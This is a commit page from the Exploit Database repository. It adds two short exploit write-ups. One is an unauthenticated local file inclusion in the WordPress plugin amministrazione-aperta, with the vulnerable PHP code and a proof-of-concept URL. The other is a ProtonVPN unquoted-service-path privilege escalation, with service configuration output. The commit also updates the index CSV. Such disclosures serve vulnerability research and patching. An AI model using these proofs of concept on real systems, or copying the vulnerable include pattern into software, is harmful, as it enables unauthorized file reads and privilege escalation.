Skip to content
This repository was archived by the owner on Nov 28, 2022. It is now read-only.

Commit 498e749

Browse files
author
Offensive Security
committed
DB: 2022-03-24
3 changes to exploits/shellcodes ProtonVPN 1.26.0 - Unquoted Service Path WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated
1 parent e55394b commit 498e749

File tree

4 files changed

+59
-1
lines changed

4 files changed

+59
-1
lines changed

exploits/multiple/remote/50833.txt

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -4,7 +4,7 @@
44
# Vendor Homepage: https://www.ivanti.com/
55
# Software Link: https://forums.ivanti.com/s/article/Customer-Update-Cloud-Service-Appliance-4-6
66
# Version: CSA 4.6 4.5 - EOF Aug 2021
7-
# Tested on: Linux x86_64 # CVE : CVE-2021-44529
7+
# Tested on: Linux x86_64
88
# CVE : CVE-2021-44529
99

1010
###

exploits/php/webapps/50838.txt

Lines changed: 27 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,27 @@
1+
# Exploit Title: WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated
2+
# Google Dork: inurl:/wp-content/plugins/amministrazione-aperta/
3+
# Date: 23-03-2022
4+
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
5+
# Vendor Homepage: https://wordpress.org/plugins/amministrazione-aperta/
6+
# Version: 3.7.3
7+
# Tested on: Firefox
8+
9+
# Vulnerable File: dispatcher.php
10+
11+
# Vulnerable Code:
12+
13+
```
14+
if ( isset($_GET['open']) ) {
15+
include(ABSPATH . 'wp-content/plugins/'.$_GET['open']);
16+
} else {
17+
echo '
18+
<div id="welcome-panel" class="welcome-panel"
19+
style="padding-bottom: 20px;">
20+
<div class="welcome-panel-column-container">';
21+
22+
include_once( ABSPATH . WPINC . '/feed.php' );
23+
```
24+
25+
# Proof of Concept:
26+
27+
localhost/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=[LFI]

exploits/windows/local/50837.txt

Lines changed: 29 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,29 @@
1+
# Exploit Title: ProtonVPN 1.26.0 - Unquoted Service Path
2+
# Date: 22/03/2022
3+
# Exploit Author: gemreda (@gemredax)
4+
# Vendor Homepage: https://protonvpn.com/
5+
# Software Link: https://protonvpn.com/
6+
# Version: 1.26.0
7+
# Tested: Windows 10 x64
8+
# Contact: gemredax@pm.me
9+
10+
PS C:\Users\Emre> sc.exe qc "ProtonVPN Wireguard"
11+
[SC] QueryServiceConfig SUCCESS
12+
13+
SERVICE_NAME: ProtonVPN Wireguard
14+
TYPE : 10 WIN32_OWN_PROCESS
15+
START_TYPE : 3 DEMAND_START
16+
ERROR_CONTROL : 1 NORMAL
17+
BINARY_PATH_NAME : C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPN.WireGuardService.exe C:\ProgramData\ProtonVPN\WireGuard\ProtonVPN.conf
18+
LOAD_ORDER_GROUP :
19+
TAG : 0
20+
DISPLAY_NAME : ProtonVPN WireGuard
21+
DEPENDENCIES : Nsi
22+
: TcpIp
23+
SERVICE_START_NAME : LocalSystem
24+
25+
26+
#Exploit:
27+
28+
The product uses a search path that contains an unquoted element, in which the element contains whitespace or other separators. This can cause the product to access resources in a parent path.
29+
If a malicious individual has access to the file system, it is possible to elevate privileges by inserting such a file as "C:\Program.exe" to be run by a privileged program making use of WinExec.

files_exploits.csv

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -11473,6 +11473,7 @@ id,file,description,date,author,type,platform,port
1147311473
50819,exploits/windows/local/50819.txt,"Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
1147411474
50824,exploits/windows/local/50824.txt,"VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path",1970-01-01,"Faisal Alasmari",local,windows,
1147511475
50834,exploits/windows/local/50834.txt,"Sysax FTP Automation 6.9.0 - Privilege Escalation",1970-01-01,bzyo,local,windows,
11476+
50837,exploits/windows/local/50837.txt,"ProtonVPN 1.26.0 - Unquoted Service Path",1970-01-01,gemreda,local,windows,
1147611477
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
1147711478
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
1147811479
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -44904,3 +44905,4 @@ id,file,description,date,author,type,platform,port
4490444905
50831,exploits/php/webapps/50831.txt,"ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover",1970-01-01,"Devansh Bordia",webapps,php,
4490544906
50828,exploits/php/webapps/50828.sh,"Tiny File Manager 2.4.6 - Remote Code Execution (RCE)",1970-01-01,"FEBIN MON SAJI",webapps,php,
4490644907
50830,exploits/php/webapps/50830.txt,"Wordpress Plugin iQ Block Country 1.2.13 - Arbitrary File Deletion via Zip Slip (Authenticated)",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php,
44908+
50838,exploits/php/webapps/50838.txt,"WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated",1970-01-01,"Hassan Khan Yusufzai",webapps,php,

0 commit comments

Comments
 (0)